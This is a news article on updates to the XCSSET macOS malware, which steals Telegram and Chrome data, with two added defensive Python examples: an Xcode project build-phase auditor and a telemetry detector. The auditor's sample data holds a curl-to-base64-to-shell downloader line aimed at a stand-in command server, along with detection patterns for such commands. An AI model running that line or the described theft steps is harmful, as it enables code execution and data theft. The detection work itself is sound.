Malware known to target macOS has once again been updated, expanding its toolset for harvesting and exfiltrating sensitive data stored in a range of applications, including Google Chrome and Telegram, as part of further “refinements in its tactics.”
XCSSET was discovered in August 2020, when it was found targeting Mac developers through an unusual distribution method: injecting a malicious payload into Xcode IDE projects, where it executes when project files are created in Xcode.
Earlier, in April, XCSSET received an upgrade that allowed its authors to target macOS 11 Big Sur as well as Macs running the M1 chipset by bypassing new security policies Apple introduced in the latest operating system.
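Because the infection vector is a payload planted inside Xcode projects, a practical defensive check is to audit every run-script build phase in a project before building it. The script below is an added example, not code from the article or from Trend Micro: it parses the `project.pbxproj` file (the OpenStep-style plist Xcode writes, assumed here to be in Xcode's own layout), lists each `PBXShellScriptBuildPhase`, and flags scripts that fetch from the network, decode base64, pipe into a shell, call `osascript` or touch hidden paths. The heuristics, the object ids and the sample script bodies are constructed for this example and are not published XCSSET indicators.

```python
"""Audit an Xcode project.pbxproj for run-script build phases worth reviewing.

Added example, not code from the article or from Trend Micro. It assumes the
project file is in the OpenStep plist format Xcode writes, and the heuristics
in SUSPICIOUS are an assumption about what a reviewer would want flagged, not
published indicators for XCSSET.
"""
import re
import sys
from typing import Dict, List

# Constructed sample: three build phases in the layout Xcode writes. The
# 24-hex-digit object ids and the script bodies are made up for this example.
SAMPLE_PBXPROJ = r'''
		1A2B3C4D5E6F708192A3B4C5 /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
		};
		C5B4A39281706F5E4D3C2B1A /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "# Swiftlint\nif which swiftlint >/dev/null; then swiftlint; fi\n";
		};
		0F1E2D3C4B5A69788796A5B4 /* ShellScript */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -s http://c2.example.invalid/stage | base64 -d | sh\n";
		};
'''

# Every object in the file is `<id> /* <comment> */ = { ... };`; the body of a
# build phase holds no nested dictionaries, so a non-greedy match up to the
# next line that is just `};` is enough.
OBJECT_RE = re.compile(
    r'(?P<id>[0-9A-F]{24})(?: /\* (?P<name>[^*]*) \*/)? = \{(?P<body>.*?)\n\s*\};',
    re.S,
)
ISA_RE = re.compile(r'\bisa = (\w+);')
SHELL_RE = re.compile(r'shellPath = ([^;]+);')
SCRIPT_RE = re.compile(r'shellScript = "((?:[^"\\]|\\.)*)";')

# Constructed heuristics: behaviour a normal lint/codegen phase rarely needs.
SUSPICIOUS = {
    'downloads_from_network': re.compile(r'\b(curl|wget)\b'),
    'decodes_base64': re.compile(r'\bbase64\b.*\s(-d|-D|--decode)\b'),
    'pipes_into_shell': re.compile(r'\|\s*(ba|z)?sh\b'),
    'runs_applescript': re.compile(r'\bosascript\b'),
    'touches_hidden_path': re.compile(r'/\.[A-Za-z0-9_]'),
}


def _unescape(value: str) -> str:
    """Undo the backslash escapes pbxproj uses inside quoted strings."""
    return re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)), value)


def run_script_phases(pbxproj: str) -> List[Dict[str, str]]:
    """Return every PBXShellScriptBuildPhase with its shell and decoded script."""
    phases = []
    for obj in OBJECT_RE.finditer(pbxproj):
        body = obj.group('body')
        isa = ISA_RE.search(body)
        if not isa or isa.group(1) != 'PBXShellScriptBuildPhase':
            continue
        shell = SHELL_RE.search(body)
        script = SCRIPT_RE.search(body)
        phases.append({
            'id': obj.group('id'),
            'name': obj.group('name') or '',
            'shellPath': shell.group(1).strip() if shell else '',
            'script': _unescape(script.group(1)) if script else '',
        })
    return phases


def audit(pbxproj: str) -> List[Dict[str, object]]:
    """Attach to each run-script phase the list of heuristics its script triggers."""
    findings = []
    for phase in run_script_phases(pbxproj):
        hits = [label for label, pat in SUSPICIOUS.items() if pat.search(phase['script'])]
        findings.append({**phase, 'hits': hits})
    return findings


if __name__ == '__main__':
    # Usage: python audit_pbxproj.py path/to/Project.xcodeproj/project.pbxproj
    text = open(sys.argv[1], encoding='utf-8').read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for f in audit(text):
        flag = 'REVIEW' if f['hits'] else 'ok'
        print(f"[{flag}] {f['id']} {f['name']!r} ({f['shellPath']}) {', '.join(f['hits'])}")
```

Run it against a freshly cloned project before opening it in Xcode; a phase with no hits is still worth reading once, since the heuristics only catch the obvious shapes of a downloader.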
“The malware downloads its own open tool from its C2 server which is pre-signed with an ad-hoc signature, whereas if it was on macOS versions 10.15 and lower it would still use the system’s built-in open command to run the applications,” Trend Micro researchers previously noted.
According to a new article published Thursday by the cybersecurity company, XCSSET executes a malicious AppleScript file that compresses the folder containing Telegram’s data (“~/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram”) into a ZIP archive and uploads it to a remote server under the attackers’ control, allowing the malicious actor to log in using the victim’s accounts.
With Google Chrome, the malware attempts to steal passwords stored in the web browser, which are encrypted with a master password called the “secure storage key,” by tricking the user into granting root privileges through a fraudulent dialog, then abusing the elevated permissions to run an unauthorized shell command that retrieves the iCloud Keychain master key, after which the content is decrypted and transmitted to the server.
Besides Chrome and Telegram, XCSSET can also loot valuable information from a range of apps, including Evernote, Opera, Skype, WeChat and Apple’s own Contacts and Notes, by recovering that data from their respective sandbox directories.
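The behaviour described above (an AppleScript that archives another app’s sandbox container and a shell command aimed at the keychain) is visible in process telemetry, and the following added example shows one way to flag it. This is not code from the article or from Trend Micro: the event records (pid, ppid, exe, args) are a constructed stand-in for whatever an endpoint-security or EDR agent emits, the Telegram path is the one the article names, and the two rules are assumptions about how such activity would surface, not published XCSSET indicators. Both rules key on an `osascript` ancestor, so an ordinary Xcode-driven `zip` in the sample is left alone.

```python
"""Flag process telemetry matching the data-theft behaviour described above.

Added example, not code from the article or from Trend Micro. The event
records (pid, ppid, exe, args) are a constructed stand-in for whatever your
endpoint-security or EDR telemetry emits, and the two rules are assumptions
about how the described behaviour would surface there, not published XCSSET
indicators.
"""
import os
from typing import Dict, List

ARCHIVERS = {'zip', 'ditto', 'tar', 'hdiutil'}
AUTOMATION_HOSTS = {'osascript'}  # the AppleScript runner named in the article
# The Telegram directory named in the article, then the general locations
# under which sandboxed apps keep their data.
SENSITIVE_DIRS = (
    'Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram',
    'Library/Group Containers/',
    'Library/Containers/',
)

# Constructed sample telemetry: an AppleScript-driven archive of the Telegram
# container and a keychain-tool call, plus a benign Xcode-driven zip for contrast.
EVENTS = [
    {'pid': 501, 'ppid': 1, 'exe': '/usr/bin/osascript', 'args': ['osascript', '/tmp/.x/run.scpt']},
    {'pid': 502, 'ppid': 501, 'exe': '/bin/sh',
     'args': ['sh', '-c', 'zip -r /tmp/.x/t.zip "$HOME/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram"']},
    {'pid': 503, 'ppid': 502, 'exe': '/usr/bin/zip',
     'args': ['zip', '-r', '/tmp/.x/t.zip', '/Users/dev/Library/Group Containers/6N38VWS5BX.ru.keepcoder.Telegram']},
    {'pid': 504, 'ppid': 501, 'exe': '/usr/bin/security', 'args': ['security', 'list-keychains']},
    {'pid': 600, 'ppid': 1, 'exe': '/Applications/Xcode.app/Contents/MacOS/Xcode', 'args': ['Xcode']},
    {'pid': 601, 'ppid': 600, 'exe': '/usr/bin/zip', 'args': ['zip', '-r', '/tmp/build.zip', '/Users/dev/proj/build']},
]


def ancestors(by_pid: Dict[int, dict], event: dict) -> List[str]:
    """Executable basenames of the parent chain, nearest parent first."""
    chain, seen, ppid = [], set(), event['ppid']
    while ppid in by_pid and ppid not in seen:  # stop at an unknown parent or a cycle
        seen.add(ppid)
        parent = by_pid[ppid]
        chain.append(os.path.basename(parent['exe']))
        ppid = parent['ppid']
    return chain


def detect(events: List[dict]) -> List[Dict[str, object]]:
    """Return one alert per event that matches a rule."""
    by_pid = {e['pid']: e for e in events}
    alerts = []
    for e in events:
        name = os.path.basename(e['exe'])
        chain = ancestors(by_pid, e)
        if not (AUTOMATION_HOSTS & set(chain)):
            continue  # both rules require an AppleScript ancestor
        if name in ARCHIVERS:
            # Rule 1: an archiver whose arguments reference another app's container
            hit = next((d for d in SENSITIVE_DIRS for a in e['args'] if d in a), None)
            if hit:
                alerts.append({'pid': e['pid'], 'rule': 'archive_of_app_container_via_applescript',
                               'detail': hit, 'chain': chain})
        elif name == 'security':
            # Rule 2: the keychain CLI driven from a script rather than a user session
            alerts.append({'pid': e['pid'], 'rule': 'keychain_tool_via_applescript',
                           'detail': ' '.join(e['args']), 'chain': chain})
    return alerts


if __name__ == '__main__':
    for a in detect(EVENTS):
        print(f"pid {a['pid']}: {a['rule']} ({a['detail']}) via {' <- '.join(a['chain'])}")
```

The ancestry walk is what keeps the rule useful: the archiver is two hops away from `osascript` in the sample (via `sh -c`), so matching only on the immediate parent would miss it. Extending `AUTOMATION_HOSTS` with other scripting hosts and `SENSITIVE_DIRS` with the containers of the other apps the article lists is the natural next step.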
“The discovery of how it can steal information from various applications highlights the degree to which the malware aggressively attempts to steal various types of information from affected systems,” the researchers said.